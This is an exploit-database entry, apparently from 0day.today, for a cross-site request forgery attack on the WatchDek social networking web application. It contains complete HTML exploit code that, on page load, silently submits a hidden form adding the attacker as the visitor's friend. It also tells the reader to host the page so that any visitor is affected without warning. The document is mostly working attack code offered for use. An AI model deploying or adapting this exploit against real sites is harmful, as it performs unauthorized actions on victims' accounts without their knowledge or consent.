Exploit for php platform in category web applications
#(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Add attacker as Friend)
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecutioner()yahoo.com
#(+) Category : Web Apps [XSRF]
#(+) App website: watchdek.com
#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. Any person who visits the website
# will see that he has automatically added the attacked on his friend list without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>WatchDek Force add attacker as Friend</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 9;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>WatchDek Force add attacker as Friend</H2>
<form method="POST" name="form5" action="http://localhost:80/index.php?option=com_comprofiler&act=connections&task=addConnection&connectionid=293">
<input type="hidden" name="message" value="Add me up Sir"/>
</form>
</body>
</html>
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################
# 0day.today [2018-02-13] #